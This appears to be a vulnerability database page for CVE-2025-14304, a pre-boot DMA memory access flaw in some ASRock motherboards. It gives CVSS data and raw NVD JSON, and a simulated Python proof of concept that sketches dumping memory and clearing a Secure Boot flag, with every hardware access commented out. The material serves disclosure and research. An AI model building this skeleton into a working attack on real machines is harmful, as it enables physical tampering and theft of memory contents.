Security Vulnerability Report
CVE-2025-14304 CVSS 6.8 MEDIUM

CVE-2025-14304

Published: 2025-12-17 04:15:44
Last Modified: 2026-04-15 00:35:42

Description

Certain motherboard models developed by ASRock and its subsidiaries, ASRockRack and ASRockInd, have a Protection Mechanism Failure vulnerability. Because the IOMMU was not properly enabled, an unauthenticated attacker with physical access can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded.

CVSS Details

CVSS Score
6.8 (CVSS v3.1 base score; the raw record below also carries a CVSS v4.0 base score of 7.0, HIGH)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

ASRock 主板(IOMMU未启用的型号)
ASRockRack 服务器主板(特定型号)
ASRockInd 工业主板(特定型号)

PoC / Exploit Code

⚠ For Security Research Only
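The following code is for security research and authorized testing only. As published it is a simulated mock-up: every device access is commented out and the read routine returns placeholder zero bytes, so it illustrates the attack flow rather than performing it.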
python
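# CVE-2025-14304 PoC - DMA Memory Dump via PCIe Device
# This PoC demonstrates DMA-based memory access when IOMMU is disabled
# Requires a DMA-capable PCIe device (e.g., FPGA development board, PCIe hardware Trojan)
#
# NOTE(review): this listing is a simulation. Every device access below is
# commented out, reads return zero-filled placeholders and writes only print a
# message, so its "[+]" output describes intent, not an observed effect.
#
# NOTE(review): the CVE description attributes the exposure to the IOMMU not
# being properly enabled before the OS kernel loads. An OS-level IOMMU policy
# starts too late to cover that window, so remediation is presumably on the
# firmware side -- confirm against the vendor advisories in the references.
import struct
import ctypes

# Define DMA access parameters
# Register offsets and command values of a hypothetical DMA engine; the code
# only mentions them in commented-out lines. DMA_STATUS_REG and DMA_COMPLETE
# appear in those comments as well but are never defined.
DMA_CONTROL_REG = 0x0000
DMA_SRC_ADDR_REG = 0x0010
DMA_DST_ADDR_REG = 0x0018
DMA_SIZE_REG = 0x0020
DMA_CMD_START = 0x00000001
DMA_CMD_STOP = 0x00000002


class DMADevice:
    """Stand-in for a DMA-capable PCIe device; no hardware is ever opened."""

    def __init__(self, pci_addr):
        # PCI address string, used only in log output.
        self.pci_addr = pci_addr
        # Never assigned a real handle anywhere in this listing.
        self.handle = None

    def connect(self):
        """Connect to DMA-capable PCIe device.

        Returns:
            bool: always True; the call that would open the device is
            commented out.
        """
        # In real attack, this would open PCIe device handle
        # self.handle = open_pcie_device(self.pci_addr)
        print(f"[*] Connecting to DMA device at {self.pci_addr}")
        return True

    def dma_read_physical(self, phys_addr, size):
        """
        Read physical memory via DMA (simulated).

        Args:
            phys_addr: Physical memory address to read
            size: Number of bytes to read

        Returns:
            bytes: ``size`` zero bytes; a placeholder, not memory contents.

        Raises:
            struct.error: if ``phys_addr`` or ``size`` does not fit the
                unsigned 64-bit / 32-bit descriptor fields.
        """
        # Configure DMA transfer
        # The packed descriptor is never sent anywhere; building it only
        # range-checks the arguments.
        config = struct.pack(
            '<QQI',
            phys_addr,  # Source: physical memory address
            0x100000,   # Destination: internal buffer
            size,       # Transfer size
        )

        # Write DMA configuration to device registers
        # self.handle.write(DMA_SRC_ADDR_REG, phys_addr)
        # self.handle.write(DMA_DST_ADDR_REG, internal_buffer)
        # self.handle.write(DMA_SIZE_REG, size)

        # Start DMA transfer
        # self.handle.write(DMA_CONTROL_REG, DMA_CMD_START)

        # Wait for completion
        # while not self.handle.read(DMA_STATUS_REG) & DMA_COMPLETE:
        #     pass

        print(f"[+] DMA Read: 0x{phys_addr:016x} ({size} bytes)")
        return b'\x00' * size  # Placeholder for actual data

    def dma_write_physical(self, phys_addr, data):
        """
        Write data to physical memory via DMA (simulated).

        Args:
            phys_addr: Physical memory address to write
            data: Data to write

        Returns:
            bool: always True; nothing is written.
        """
        # Configure reverse DMA transfer
        # self.handle.write(DMA_SRC_ADDR_REG, data_buffer)
        # self.handle.write(DMA_DST_ADDR_REG, phys_addr)
        # self.handle.write(DMA_SIZE_REG, len(data))
        # self.handle.write(DMA_CONTROL_REG, DMA_CMD_START)

        print(f"[+] DMA Write: 0x{phys_addr:016x} ({len(data)} bytes)")
        return True


def exploit_uefi_variable(phys_addr):
    """Example: Modify UEFI variable in memory (simulated).

    Reads 64 placeholder bytes at ``phys_addr``, clears the first byte and
    passes the result to the simulated write.

    NOTE(review): the data is not parsed as a UEFI variable, so which setting
    byte 0 would control is not established by this code.

    Args:
        phys_addr: Physical address the example pretends to patch.
    """
    device = DMADevice("0000:01:00.0")
    if not device.connect():
        return

    # Read current UEFI variable
    current = device.dma_read_physical(phys_addr, 64)
    print(f"[*] Current variable: {current.hex()}")

    # Modify variable (e.g., disable Secure Boot)
    patched = bytearray(current)
    patched[0] = 0x00  # Disable flag

    # Report success only when the write call itself reports it.
    if device.dma_write_physical(phys_addr, bytes(patched)):
        print("[+] UEFI variable modified successfully")


def dump_kernel_memory():
    """Example: Dump kernel memory before OS security loads (simulated).

    Walks the first 1 MiB of physical addresses in 4 KiB steps and returns
    the first page containing the bytes ``MZ``.

    Returns:
        bytes | None: the matching page, or None when nothing matches. With
        the zero-filled placeholder reads the result is always None.
    """
    device = DMADevice("0000:01:00.0")
    if not device.connect():
        return None

    # Read first 1MB of physical memory (contains boot sector, kernel)
    for offset in range(0, 0x100000, 0x1000):
        page = device.dma_read_physical(offset, 0x1000)
        # b'MZ' is the DOS/PE executable header magic, so the "boot sector"
        # wording in the message below is loose.
        if b'MZ' in page:  # Windows PE signature
            print(f"[*] Found boot sector at 0x{offset:016x}")
            return page
    return None


if __name__ == "__main__":
    print("[*] CVE-2025-14304 PoC - IOMMU Bypass via DMA")
    print("[*] Target: ASRock/ASRockRack/ASRockInd motherboards with IOMMU disabled")

    # Uncomment to run:
    # dump_kernel_memory()
    # NOTE(review): 0xFED40000 is conventionally the TPM MMIO (TIS) window on
    # x86 PC platforms, not a UEFI variable store; read the label below as
    # illustrative only.
    # exploit_uefi_variable(0xFED40000)  # UEFI variable store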

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14304", "sourceIdentifier": "[email protected]", "published": "2025-12-17T04:15:44.447", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Certain motherboard models developed by ASRock and its subsidiaries, ASRockRack and ASRockInd. has a Protection Mechanism Failure vulnerability. Because IOMMU was not properly enabled, unauthenticated physical attackers can use a DMA-capable PCIe device to read and write arbitrary physical memory before the OS kernel and its security features are loaded."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-693"}]}], "references": [{"url": "https://www.asrock.com/support/Security.asp", "source": "[email protected]"}, {"url": "https://www.asrockind.com/zh-tw/security-center", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/en/cp-139-10579-9205b-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10578-c43b4-1.html", "source": "[email protected]"}]}}